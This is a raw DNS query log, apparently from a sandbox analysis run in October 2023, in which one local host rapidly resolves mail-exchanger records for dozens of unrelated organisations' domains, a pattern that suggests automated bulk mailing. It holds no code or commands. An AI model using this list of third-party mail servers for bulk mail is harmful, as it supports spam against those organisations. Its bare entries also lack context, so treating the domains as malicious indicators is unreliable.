                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.881279945 CEST70.167.153.35192.168.2.30xf6b6No error (0)relay.sumix.com88.198.234.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.895085096 CEST162.159.24.202192.168.2.30xf6b6No error (0)mx.anitadarkvideos.net165.227.123.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.915129900 CEST162.159.24.198192.168.2.30xf6b6No error (0)dessy.com.2.0001.arsmtp.com8.19.118.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.036073923 CEST186.227.204.61192.168.2.30xe6b6No error (0)linochaves.com186.227.204.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.054039955 CEST1.1.1.1192.168.2.30x2ecfNo error (0)ns1.webhs.org89.26.240.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.324244976 CEST1.1.1.1192.168.2.30x634eNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.380373001 CEST1.1.1.1192.168.2.30xc63eNo error (0)nsa.pegasodns.net81.29.220.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.437180042 CEST45.76.116.209192.168.2.30x5ebdNo error (0)crosstech.com.au45.76.116.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.457966089 CEST1.1.1.1192.168.2.30xda98No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.627170086 CEST89.26.240.75192.168.2.30x5ebdNo error (0)plenimagem.com185.90.59.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.666640043 CEST208.67.220.220192.168.2.30x33a5No error (0)syntrans.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.666640043 CEST208.67.220.220192.168.2.30x33a5No error (0)syntrans.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.703258991 CEST81.29.220.20192.168.2.30xd6c3No error (0)immobiliarepunto.it81.29.220.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.708688021 CEST1.1.1.1192.168.2.30xb12fNo error (0)ns1.yandex.ru213.180.193.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.878186941 CEST1.1.1.1192.168.2.30x9d88No error (0)ns2.ipage.com65.254.254.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.883692980 CEST162.159.24.202192.168.2.30x4fcaNo error (0)mx.anitadarkvideos.net165.227.123.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:51.885687113 CEST208.80.124.2192.168.2.30x4fcaNo error (0)mx1.pythian.com3.211.98.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.054527998 CEST213.180.193.1192.168.2.30x4fcaNo error (0)mx.yandex.net77.88.21.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.120048046 CEST65.254.254.151192.168.2.30x75ceNo error (0)mx.homebeautiful.ca66.96.140.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.120048046 CEST65.254.254.151192.168.2.30x75ceNo error (0)mx.homebeautiful.ca66.96.140.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.194160938 CEST1.1.1.1192.168.2.30x5d10No error (0)ns1.syrahost.com27.124.125.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.381654978 CEST108.162.193.160192.168.2.30x4bd5No error (0)mail.eilhk.com182.239.56.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.394876957 CEST208.80.124.2192.168.2.30x4bd5No error (0)mymail.markerman.com66.206.11.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.398565054 CEST157.131.0.39192.168.2.30x4bd5No error (0)mailin-01.mx.sonic.net157.131.224.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.398565054 CEST157.131.0.39192.168.2.30x4bd5No error (0)mailin-01.mx.sonic.net157.131.224.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.398565054 CEST157.131.0.39192.168.2.30x4bd5No error (0)mailin-01.mx.sonic.net157.131.224.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.409488916 CEST1.1.1.1192.168.2.30x9ab2No error (0)ns-769.awsdns-32.net205.251.195.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.419255018 CEST97.79.236.55192.168.2.30x4bd5No error (0)domenicamato.com97.79.236.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.521080971 CEST27.124.125.1192.168.2.30xdd5No error (0)mail.culver.com.au103.250.215.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.585764885 CEST205.251.195.1192.168.2.30x91d9No error (0)relay.coreconsulting.it151.5.114.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.589256048 CEST1.1.1.1192.168.2.30x5ce8No error (0)ns2.webunlimited.com208.88.72.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.609049082 CEST162.159.24.198192.168.2.30x91d9No error (0)idealtile.com.2.0001.arsmtp.com8.19.118.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.648766994 CEST162.159.26.185192.168.2.30x91d9No error (0)mail.trinom.com185.178.194.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.652731895 CEST137.118.1.28192.168.2.30x91d9No error (0)peoplescom-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.823488951 CEST199.231.93.237192.168.2.30xd7ddNo error (0)mail.resumesrv.com199.231.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.832226038 CEST208.88.72.111192.168.2.30xa8ddNo error (0)scanner1.bvcaa.org208.91.12.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.899327040 CEST1.1.1.1192.168.2.30xef6No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:52.926269054 CEST195.8.222.24192.168.2.30xb7ddNo error (0)mail.glasslam-asia.com195.8.222.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.151527882 CEST1.1.1.1192.168.2.30x61dcNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.151527882 CEST1.1.1.1192.168.2.30x61dcNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.179358006 CEST1.1.1.1192.168.2.30x93bNo error (0)ns0.ntt.co.th116.68.146.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.369456053 CEST97.74.103.4192.168.2.30x90eeNo error (0)mail.gwyneddwealthpartners.com69.174.52.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.384571075 CEST50.87.144.21192.168.2.30x90eeNo error (0)mail.sequere.com192.185.226.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.404778957 CEST1.1.1.1192.168.2.30x4b1bNo error (0)ns1.zprtk.net192.169.156.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.416368961 CEST208.84.67.208192.168.2.30x90eeNo error (0)mx0a-00170501.pphosted.com67.231.148.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.523200989 CEST213.180.193.1192.168.2.30x80eeNo error (0)mx.yandex.net77.88.21.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.543230057 CEST116.68.146.1192.168.2.30xcbecNo error (0)mail.gsl-th.com116.68.154.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.577820063 CEST192.169.156.103192.168.2.30x62f3No error (0)mail.meta-lab.com192.169.188.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.633414030 CEST162.159.24.198192.168.2.30x18f5No error (0)fallsburgny.com.1.0001.arsmtp.com8.31.233.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.637290955 CEST1.1.1.1192.168.2.30x8a0No error (0)ns1.regzone.de23.92.29.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.804111958 CEST108.162.193.142192.168.2.30xcbf9No error (0)mail.networkvenezuela.com199.201.89.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.837654114 CEST108.162.193.126192.168.2.30xbffbNo error (0)send.aweber.com44.213.212.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.850590944 CEST23.92.29.43192.168.2.30xcbf9No error (0)mail3.ocel.cz90.181.133.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.856391907 CEST216.106.1.254192.168.2.30xcbf9No error (0)mxa.inbound.socket.net216.106.44.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.875129938 CEST1.1.1.1192.168.2.30x9c0aNo error (0)ns13.asurahosting.com198.251.89.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.888407946 CEST162.159.24.198192.168.2.30xcffbNo error (0)reaganfoundation.org.1.0001.arsmtp.com8.31.233.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.888495922 CEST162.159.24.80192.168.2.30xdefbNo error (0)mail.terradoliva.com69.89.31.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:53.934200048 CEST137.118.1.28192.168.2.30xcffbNo error (0)mepotelco-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.022965908 CEST14.29.61.46192.168.2.30xbffbNo error (0)mailex.2980.comproxy.2980.com.dycdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.034873962 CEST1.1.1.1192.168.2.30xf77aName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.224411964 CEST198.251.89.164192.168.2.30x1802No error (0)mail.hotmai.it69.48.163.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.253187895 CEST1.1.1.1192.168.2.30x725fNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.370531082 CEST1.1.1.1192.168.2.30x2754No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.373589039 CEST1.1.1.1192.168.2.30xf989No error (0)ns1.garr.net193.206.141.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.514410973 CEST1.1.1.1192.168.2.30x43a9No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.545598030 CEST1.1.1.1192.168.2.30x1c99No error (0)zelda.ns.cloudflare.com108.162.192.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.545598030 CEST1.1.1.1192.168.2.30x1c99No error (0)zelda.ns.cloudflare.com172.64.32.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.545598030 CEST1.1.1.1192.168.2.30x1c99No error (0)zelda.ns.cloudflare.com173.245.58.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.700259924 CEST193.206.141.38192.168.2.30x2f13No error (0)mx-05.uniroma2.it160.80.6.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.711576939 CEST108.162.192.242192.168.2.30xd217No error (0)mail.ryico.org23.106.61.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.711993933 CEST156.154.132.200192.168.2.30xd217No error (0)mail.ebtnet.net94.130.181.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.725580931 CEST156.154.132.200192.168.2.30x9819No error (0)mx02.xnote.us172.105.237.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.727154016 CEST156.154.132.200192.168.2.30x9819No error (0)mx02.xnote.us172.105.237.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.817285061 CEST137.118.1.28192.168.2.30x9819No error (0)dcdi-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.817368984 CEST137.118.1.28192.168.2.30x9819No error (0)dcdi-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:54.867357969 CEST200.68.105.101192.168.2.30xd217No error (0)mail.p-per.com200.68.105.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.275022030 CEST9.9.9.9192.168.2.30xf12cNo error (0)mx01.naspers.com152.111.195.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.289304018 CEST208.67.222.222192.168.2.30x2dNo error (0)em4.mainnetmail.com142.93.233.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.294543982 CEST1.0.0.1192.168.2.30x2dNo error (0)mail.eilhk.com182.239.56.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.297859907 CEST8.8.4.4192.168.2.30x2dNo error (0)publicms1.mail2world.com35.167.34.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.297859907 CEST8.8.4.4192.168.2.30x2dNo error (0)publicms1.mail2world.com34.226.24.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.297859907 CEST8.8.4.4192.168.2.30x2dNo error (0)publicms1.mail2world.com54.88.152.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.297859907 CEST8.8.4.4192.168.2.30x2dNo error (0)publicms1.mail2world.com44.237.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.310458899 CEST1.1.1.1192.168.2.30xd52eNo error (0)ms2.mail2world.com44.237.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.310458899 CEST1.1.1.1192.168.2.30xd52eNo error (0)ms2.mail2world.com35.167.34.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.310458899 CEST1.1.1.1192.168.2.30xd52eNo error (0)ms2.mail2world.com34.226.24.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.310458899 CEST1.1.1.1192.168.2.30xd52eNo error (0)ms2.mail2world.com54.88.152.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.312283993 CEST8.8.8.8192.168.2.30xd52eNo error (0)sc133.sgcloudhosting.cloud103.7.8.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.314311028 CEST149.112.112.112192.168.2.30xf12cNo error (0)cpacanada-ca.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.314311028 CEST149.112.112.112192.168.2.30xf12cNo error (0)cpacanada-ca.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.315032959 CEST1.0.0.1192.168.2.30xd52eNo error (0)mxa-00181c02.gslb.pphosted.com185.183.28.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.318609953 CEST1.1.1.1192.168.2.30xe52eNo error (0)mx.breakthur.com164.90.203.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.324316978 CEST8.8.8.8192.168.2.30xd52eNo error (0)mxb-00115402.gslb.pphosted.com148.163.153.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.329946995 CEST9.9.9.9192.168.2.30x2dNo error (0)domenicamato.com97.79.236.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.331399918 CEST208.67.222.222192.168.2.30x2dNo error (0)mailin-01.mx.sonic.net157.131.224.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.331399918 CEST208.67.222.222192.168.2.30x2dNo error (0)mailin-01.mx.sonic.net157.131.224.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.331399918 CEST208.67.222.222192.168.2.30x2dNo error (0)mailin-01.mx.sonic.net157.131.224.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.332581043 CEST149.112.112.112192.168.2.30xd52eNo error (0)relay.coreconsulting.it151.5.114.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.336292028 CEST149.112.112.112192.168.2.30x232fNo error (0)mx0a-00170501.pphosted.com67.231.148.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.338565111 CEST9.9.9.9192.168.2.30xd52eNo error (0)idealtile.com.2.0001.arsmtp.com8.19.118.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.341330051 CEST8.8.4.4192.168.2.30x142fNo error (0)mxb-0006de01.gslb.pphosted.com148.163.149.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.343566895 CEST8.8.4.4192.168.2.30x232fNo error (0)li585-225.members.linode.com151.236.221.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.345923901 CEST208.67.220.220192.168.2.30x232fNo error (0)fwd1.porkbun.com44.226.226.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.346204042 CEST8.8.4.4192.168.2.30x232fNo error (0)custmx.cscdns.net198.58.121.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.347204924 CEST208.67.222.222192.168.2.30x232fNo error (0)mail.gwyneddwealthpartners.com69.174.52.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.347876072 CEST208.67.220.220192.168.2.30x142fNo error (0)netoverdrive-com-au.p10.mxthunder.com216.172.106.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.347876072 CEST208.67.220.220192.168.2.30x142fNo error (0)netoverdrive-com-au.p10.mxthunder.com209.41.68.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.355844021 CEST149.112.112.112192.168.2.30x142fNo error (0)comstarauto-com.mail.protection.outlook.com104.47.74.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.358237028 CEST208.67.222.222192.168.2.30x332fNo error (0)mail.mailinator.com23.239.11.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.361861944 CEST208.67.220.220192.168.2.30x102dNo error (0)mymail.markerman.com66.206.11.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.378891945 CEST1.1.1.1192.168.2.30x2dNo error (0)foodallergy-com.mail.protection.outlook.com104.47.66.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.378891945 CEST1.1.1.1192.168.2.30x2dNo error (0)foodallergy-com.mail.protection.outlook.com104.47.59.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.379652023 CEST1.0.0.1192.168.2.30x232fNo error (0)mail.sequere.com192.185.226.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.380424976 CEST149.112.112.112192.168.2.30xf12cNo error (0)prtcnetmx.prtcom.com209.213.16.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.383425951 CEST208.67.220.220192.168.2.30x232fNo error (0)fsr-mx.email-protect.gosecure.net208.80.204.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.383924007 CEST149.112.112.112192.168.2.30x332fNo error (0)fallsburgny.com.1.0001.arsmtp.com8.31.233.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.389731884 CEST1.1.1.1192.168.2.30x332fNo error (0)mail.meta-lab.com192.169.188.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.394455910 CEST149.112.112.112192.168.2.30x232fNo error (0)mx3c40.carrierzone.com64.29.151.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.405878067 CEST8.8.8.8192.168.2.30x332fNo error (0)sgcm-net.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.405878067 CEST8.8.8.8192.168.2.30x332fNo error (0)sgcm-net.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.406919956 CEST149.112.112.112192.168.2.30xf12cNo error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.417424917 CEST9.9.9.9192.168.2.30xd52eNo error (0)peoplescom-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.419781923 CEST149.112.112.112192.168.2.30xe52eNo error (0)scanner1.bvcaa.org208.91.12.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.437407970 CEST208.67.220.220192.168.2.30xe52eNo error (0)mail.trinom.com185.178.194.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.468384027 CEST149.112.112.112192.168.2.30x2dNo error (0)lbconstructioninc.com.mx1.rcimx.com208.80.204.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.474232912 CEST8.8.4.4192.168.2.30xd52eNo error (0)mail.lb.auchan.pt62.28.164.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.483697891 CEST208.67.222.222192.168.2.30x2dNo error (0)fojab-se.mx1.staysecuregroup.com185.38.181.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.484350920 CEST1.0.0.1192.168.2.30x142fNo error (0)mail.resumesrv.com199.231.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.499809980 CEST1.1.1.1192.168.2.30x831No error (0)cluster-h.mailcontrol.com208.87.234.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.518069029 CEST208.67.220.220192.168.2.30x332fNo error (0)mx.leonet.it212.19.106.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.518069029 CEST208.67.220.220192.168.2.30x332fNo error (0)mx.leonet.it212.19.106.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.581888914 CEST9.9.9.9192.168.2.30x232fNo error (0)mx01.nicmail.ru91.189.116.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.581888914 CEST9.9.9.9192.168.2.30x232fNo error (0)mx01.nicmail.ru91.189.116.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.581888914 CEST9.9.9.9192.168.2.30x232fNo error (0)mx01.nicmail.ru91.189.116.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.581888914 CEST9.9.9.9192.168.2.30x232fNo error (0)mx01.nicmail.ru91.189.116.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.599911928 CEST1.1.1.1192.168.2.30xda99No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.599911928 CEST1.1.1.1192.168.2.30xda99No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.685609102 CEST149.112.112.112192.168.2.30xf12cNo error (0)mx2.mail.ovh.net87.98.160.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.700177908 CEST208.67.222.222192.168.2.30x142fNo error (0)mail.glasslam-asia.com195.8.222.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.798717022 CEST1.0.0.1192.168.2.30x831No error (0)mail3.ocel.cz90.181.133.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.834124088 CEST208.67.222.222192.168.2.30x42a5Server failure (2)srbattery.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.872942924 CEST208.67.222.222192.168.2.30x2dNo error (0)mail.culver.com.au103.250.215.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.885591984 CEST208.67.222.222192.168.2.30xd52eNo error (0)mx100.nn.hr194.152.251.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.984060049 CEST208.67.220.220192.168.2.30x6f4cNo error (0)mxa-0010b102.gslb.pphosted.com185.183.29.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.984905958 CEST8.8.4.4192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.984905958 CEST8.8.4.4192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.984905958 CEST8.8.4.4192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.984905958 CEST8.8.4.4192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.989803076 CEST208.67.220.220192.168.2.30x7f4cNo error (0)mx1.orcon.net.nz202.180.64.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.992010117 CEST208.67.220.220192.168.2.30x7f4cNo error (0)hsmx149.cn4e.com47.75.41.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:55.993336916 CEST1.0.0.1192.168.2.30x7f4cNo error (0)uk.mx1.mailanyone.net192.162.217.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.008718967 CEST8.8.8.8192.168.2.30x7f4cNo error (0)mxa-00620701.gslb.pphosted.com205.220.175.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.009444952 CEST1.1.1.1192.168.2.30x8e4cNo error (0)ftcispnet-mx.email-protect.gosecure.net208.80.204.155A (IP address)IN (0x0001)false
